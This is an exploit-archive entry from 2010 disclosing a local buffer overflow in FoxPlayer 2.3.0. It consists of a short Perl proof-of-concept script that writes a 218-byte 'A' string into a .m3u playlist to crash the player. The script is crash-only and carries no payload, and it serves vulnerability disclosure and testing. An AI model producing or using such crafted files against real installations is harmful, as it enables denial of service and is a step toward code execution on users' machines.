id: 14423
date: 10/11/2010
title: FoxPlayer 2.3.0 (.m3u) Buffer Overflow Vulnerability
author: secuid0
cves: 

====================================================
FoxPlayer 2.3.0 (.m3u) Buffer Overflow Vulnerability
====================================================

#!/usr/bin/perl
###########################################################################
#Title: FoxPlayer Version 2.3.0 (.m3u) Local BOF PoC
#Download: http://www.foxmediatools.com/products/foxplayer.html
#Tested on WinXP Pro SP2
#Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
#Greetz: offsec and inj3ct0r teams
###########################################################################
my $junk= "\x41" x 218 ; #Application will crash with 218 bytes, more will do the job too
open(file,">crash.m3u");
print file $junk ;
close(file);



#  0day.today [2023-03-23]  #